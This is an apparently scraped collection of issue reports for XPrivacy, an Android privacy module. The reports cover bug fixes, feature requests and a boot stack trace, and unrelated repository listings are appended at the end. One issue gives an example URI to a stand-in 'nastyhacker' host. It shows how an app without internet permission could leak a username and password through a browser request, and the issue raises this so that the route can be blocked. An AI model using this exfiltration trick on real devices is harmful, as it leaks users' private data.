XPrivacy - The ultimate, yet easy to use, privacy manager
Home Page: http://forum.xda-developers.com/xposed/modules/xprivacy-ultimate-android-privacy-app-t2320783
License: GNU General Public License v3.0
Upgraded from 0.17 to 0.19.
Selected data restrictions (i.e. Ticks) are no longer shown in Categories. Blank boxes are shown even if the data has been restricted.
The selections are not lost though. They are still shown if you click on the app icon itself to view the full list.
It would be much easier to protect our privacy, if we could for example summed up all apps in one group, which require the permission "location".
Meaning they can be more or less permissive, rather than hard-coding in a situation which might "break" some apps (ie. browsers etc)
Block up all possible data egress avenues.
Ability to send SMS or MMS
Ability to initiate a call
Ability to establish bluetooth connections
(I think already done) Ability to control WiFi connections or add networks
Ability to work with NFC
I believe this covers all standard ways to communicate, as we have internet already covered. By blocking calls and SMS/MMS, that leaves only "on-device wireless" comms. ie. bluetooth, NFC, wifi.
Anything I missed?
It appears slightly confusing to have all apps appear in the batch edit list, when an app doesn't have access to a permission.
I am wondering if it might be more intuitive for only apps that request a given set of permissions to appear in the list for that batch edit menu?
V0.29 brings up the keyboard immediately on launch covering good part of the screen. Since keyboard is not used often this seems unnecessary.
Certain apps will only run if the user is either in the USA or out of the USA...by allowing the user to set a location/region specific to the app it prevents any issues.
In newer versions I saw the textbox is overlapping label in XPrivacy with Slovenian language.
Screenshot: https://docs.google.com/file/d/0B76irg0OVJ87Y1J6WXhQdlRBZEk/edit?usp=sharing
Restricting apps from accessing location data seems to cause high battery drain. For example, after the Facebook app has been running or is still running in the background, Better Battery Stats reports a higher than usual NetworkLocationLocator with a high number of wakelocks for it. Better Battery Stats also reports that deep sleep time is low, whereas before it would be at least 80% after several hours of the phone being switched on. Switching off "Use GPS Satellites" and "Use wireless networks" in the phone's location settings prevents this battery drain.
Since you can now export settings AND you have a pro key file consider creating a XPrivacy subdir off root folder of sd card and keeping everything in there? Eventually you might add other files etc to the folder without cluttering the root of the sd card up. Backups could be modded to just backup the whole dir which would also potentially keep backups of the person's keyfile.
As opposed to the idea of constant popup notifications for every blocked call perhaps a debug log could be provided in xprivacy that shows all blocked calls with a timestamp......also allowing the user to pull up all entries by app may help resolve if the user has caused a problem in an app by blocking a permission actually needed.
Say you access an app's menu, it lists the permissions it has requested (green circle). Is it possible to include this in the list of apps under a heading? For example: choosing 'Calendar' would list all the apps, but those with that permission requested being highlighted (say with the green circle).
I don't mean to be fussy. Really appreciate the addition. These could be of benefit in the future:
use action bar navigate up in non-main activities.
In order to help prevent battery drain, tell a location restricted app that GPS is unavailable. The hope is that GPS will not be triggered and the app will fall back to other means of accessing location data. Any well written app should simply pop up a dialogue requesting GPS be switched on instead.
Using a rooted nexus 4 with stock rom.
Any other information I can provide?
Blocking network access works :-) (I have it installed correctly)
I am requesting the ability to import/export the rules to a file which can be loaded by other devices the user may own. This will allow the user to keep all the rules sync'd for consistency.
It's possible to send data without the internet permission, if you make a URL containing the data to send, and send that to a server listening for a GET request.
ie. an app can request a browser to the URI of "www.nastyhacker.example.org/leechdata.php?datatoleech=UserName%20T0ps3cr3tP4ssw0rd" or similar...
I suggest if an app doesn't have internet permission, it gets blocked from calling HTTP URIs
The idea discussed was that
a) an app cannot access files created by another app
b) if a number of apps are to be used "together", they will have the same group set (ie. you can set instagram app and your preferred photo viewer app to both be group "photos")
c) this will only apply/work on unified storage (/data/media) devices. If a device uses external SD card (ie. a real "card") too, it would need to be formatted as EXT4, which depends on the ROM and device for support. FAT not supported.
Improvement suggestion - app icon to be pressable so the user can long-press on the logo, not just the text or checkbox.
Perhaps the user should be able to tap the icon to get to the app specific screen, and the long-press wouldn't be needed?
Where I see this becoming a problem is if you've spoofed a number of a value that is in use legitimately by someone. Say your random IMEI is exactly the same as someone else's. That's probably morally wrong, and possibly illegal? This would go well with obvious spoofed static strings.
But for IP/MAC address, and some other things, randomised can be useful.
Method
Install multiple apps
Xprivacy shows notifications for each app
Tap one of the notifications (let's call it app 1)
XPrivacy shows perms for app 1
Tap another notification for (let's say) app 2
Privacy stays on the screen showing app 1
Originally reported by Tassos_i on xda.
Reproduced on stock rooted Galaxy S3 4.1.2 with Skype 3.2.0.6673 (current version), with Xprivacy 0.26 and 0.27.
Can't supply a logcat at the moment or for the next week, but I have a lovely screenshot.
Highlighted by aussiebum:
"Feature request (if possible) - Instead of default deny, how about a default of "Ask", with popup notifications (like Superuser/SuperSU) for when a particular app needs access to a particular permission, and then have the option to Allow/Deny Always/Once? This is how LBE Security Manager / Privacy Guard works, which is really handy."
Ref: http://forum.xda-developers.com/showpost.php?p=42567860&postcount=61
At the moment, for example with 0.17 if you prevent access to the bookmarks, you also deny the ability of the app from launching a url in a browser. At the moment it's either all or nothing.
One option would be to keep splitting the settings, which would make it a tedious affair to set app preferences.
My proposal instead would be to have the current behavior of 0.17 as the default setting, but with the possibility of, say, clicking on that heading to give you child options. If the child options are not all checked, you get a greyed checkbox. You could then broadly apply some settings with default denials and dig deeper if you want more granular control. I suspect this is going to add complexity. Not worth if there is a significant performance hit or memory cost.
(sorry for my bad english) For new apps, instead to show a notification to allow permissions, ask with a popup when an app will access a permission.
For example, a new app try to access my contacts, then show a popup with message: "The app 'xxx' is trying to access your contacts" and buttons to allow, deny, always allow, always deny.
This can be done with new apps. If I manually mark permissions to deny on the UI, then don't show that popup.
Thanks!
Would it be reasonable to have a settings menu where you could set preferences like expert mode, whether you want nagging popups after install, default locations and file names for export/import etc.? Maybe consider a file/path chooser for the imports/exports.
the ui is accessible even when the module is disabled.
you can tick/untick stuff. but the orange triangle does not appear.
so if module is not enabled, it needs to let the user know
This is kinda odd and rather rare I think, but here's the run down
Cm10.1 nightly 6/21 on sgh i777
xposed 2.1.4
XPrivacy 0.2.9
Cwm 4.2.x patch installed
Install an app
Xprivacy alerts of new app permissions
Uninstall that app
Notification from xprivacy remains
Tap on notification
Xprivacy force closes
Xprivacy starts itself right away
So in the end on glad it basically restarted itself, but i figured I'd report the force close.
Suggest an icon more informational than "error" style, such as (for example)
http://www.iconfinder.com/icondetails/10584/48/info_icon
or
http://www.iconfinder.com/icondetails/10596/48/alert_warning_icon
Getprop strings can reveal AndroidID (via the default hostname), and imei on some devices (ro.gsm.imei for example).
Run the getprop command on your device, and see what's available. This can be called from SystemProperties (non-publicised API I believe), or the binary itself
Apps can use ProcessBuilder as well as exec(), so this should be protected as well.
Normally, after rebooting and entering my pin code, my I9505 needs about 2 secs to confirm that date and time have been updated and another 2-3 secs to confirm that wifi has been connected as well as to activate "day by day" app widget.
However, upon activating xprivacy, date and time confirmation still come after 2 secs, BUT wifi confirmation and widget activation come after a whole 90 secs !!! And it is indifferent if I have restricted or not some permissions in "day by day" (identification, phone).
Is this normal behavior ?
Dear, can you provide 2 option for an internet option under app?
In some case I just want to give app access with wifi and not mobile data, is it possibble?
and also can you divide apps in 2 parts eg: the upper part contains installed apps and than the list of system apps.
[IMG]http://img.tapatalk.com/d/13/06/22/segy5e7y.jpg[/IMG]
I have mark circle on the that is for expert mode, and in expert mode the apps are divided as installed and system (trusted).
Link does not work.
The following exception happens during boot (CM 10.1).
Android still loads fine so I'm not sure if it affects anything important.
To fix this we could either add a try catch block, or preferably find a way to detect when the system isn't ready before using ContentResolver.query (Though I couldn't find an official way to do that).
06-07 12:06:05.562 W/System.err( 548): java.lang.IllegalArgumentException: Attempt to launch content provider before system ready
06-07 12:06:05.562 W/System.err( 548): at com.android.server.am.ActivityManagerService.getContentProviderImpl(ActivityManagerService.java:6522)
06-07 12:06:05.562 W/System.err( 548): at com.android.server.am.ActivityManagerService.getContentProvider(ActivityManagerService.java:6677)
06-07 12:06:05.562 W/System.err( 548): at android.app.ActivityThread.acquireProvider(ActivityThread.java:4647)
06-07 12:06:05.562 W/System.err( 548): at android.app.ContextImpl$ApplicationContentResolver.acquireUnstableProvider(ContextImpl.java:2054)
06-07 12:06:05.562 W/System.err( 548): at android.content.ContentResolver.acquireUnstableProvider(ContentResolver.java:1101)
06-07 12:06:05.562 W/System.err( 548): at android.content.ContentResolver.query(ContentResolver.java:356)
06-07 12:06:05.562 W/System.err( 548): at android.content.ContentResolver.query(ContentResolver.java:315)
06-07 12:06:05.562 W/System.err( 548): at biz.bokhorst.xprivacy.XRestriction.getRestricted(XRestriction.java:150)
06-07 12:06:05.562 W/System.err( 548): at biz.bokhorst.xprivacy.XHook.getRestricted(XHook.java:45)
06-07 12:06:05.562 W/System.err( 548): at biz.bokhorst.xprivacy.XTelephonyManager.isRestricted(XTelephonyManager.java:90)
06-07 12:06:05.562 W/System.err( 548): at biz.bokhorst.xprivacy.XTelephonyManager.before(XTelephonyManager.java:56)
06-07 12:06:05.562 W/System.err( 548): at biz.bokhorst.xprivacy.XPrivacy$1.beforeHookedMethod(XPrivacy.java:238)
06-07 12:06:05.572 W/System.err( 548): at de.robv.android.xposed.XposedBridge.handleHookedMethod(XposedBridge.java:432)
06-07 12:06:05.572 W/System.err( 548): at android.telephony.TelephonyManager.listen(Native Method)
06-07 12:06:05.572 W/System.err( 548): at android.media.AudioService.<init>(AudioService.java:567)
06-07 12:06:05.572 W/System.err( 548): at com.android.server.ServerThread.run(SystemServer.java:675)
06-07 12:06:05.572 W/System.err( 548): at de.robv.android.xposed.XposedBridge.invokeOriginalMethodNative(Native Method)
06-07 12:06:05.572 W/System.err( 548): at de.robv.android.xposed.XposedBridge.invokeOriginalMethod(XposedBridge.java:624)
06-07 12:06:05.572 W/System.err( 548): at de.robv.android.xposed.XposedBridge.handleHookedMethod(XposedBridge.java:455)
06-07 12:06:05.572 W/System.err( 548): at com.android.server.ServerThread.run(Native Method)
Keypad only allows for positive integers. - and . characters inaccessible.
http://forum.xda-developers.com/showpost.php?p=42825550&postcount=299
After installing a new app, a notification is triggered to invite you to update the restrictions on this app.
Tapping on this notification takes you to the settings for the last installed app, or a previously viewed app (not sure which), rather than the app which has just been installed.
Most noticeable when installing several apps at the same time (or in a sitting), and then trying to restrict them in a row, using the notification that is triggered.
When you install an app, the XPrivacy just pop up. I would much rather see a notfication(and with clicking on notification, the app will show) instead of just popping up an app.
Thanks.
Is it possible to restrict the size of the active checkbox area to the space around the checkbox?
While sccrolling through the list of apps it often happens to me that i accidently activate a checkbox - and later i wonder why an app misbehaves...
Currently, internet permission denies or allows all access to internet. Some apps transfer large amounts of data and should not be allowed on a a data plan but would be okay on a wifi connection. AFWall+ and Avast implement their firewall in this fashion - separate permissions for 3G and Wifi.
Pls add version number on permission page for that app.
for example
Like in lbe if we select any app for setting permissions it on the top it shows the app name as you do and also that app version, foe example I have installed indian sygic and International sygic both purchased and both appears as sygic, how should I differentiate beween them.
Is it indian sygic or international one. One thing both habe different version, so it can be recognize with the help of version.
add search for apps inside xprivacy.
add filtering options like xposed app settings
filtering of search results,
example for filtering
apps with changed settings & without
apps with x permission & without - put all blockable permissions in place of x
etc
Would permit a user to allow an app to only access the contacts it "needs", in order to preserve privacy and reduce data leakage to permit an app to function.
Example usage - user wishes to use a VoIP or similar app (say whatsapp), but only giving it access to a small portion of the user's contacts list, to prevent business contacts from being added to a personal whatsapp account
i suggest this order
blocked apps
apps with permission but not blocked
others
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
๐ Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
Django
The Web framework for perfectionists with deadlines.
Laravel
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. ๐๐๐
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
Microsoft
Open source projects and samples from Microsoft.
Google
Google โค๏ธ Open Source for everyone.
Alibaba
Alibaba Open Source for everyone
D3
Data-Driven Documents codes.
Tencent
China tencent open source team.
![http://img.tapatalk.com/d/13/06/22/segy5e7y.jpg[/IMG]](http://img.tapatalk.com/d/13/06/22/segy5e7y.jpg%5B/IMG%5D){kind=link}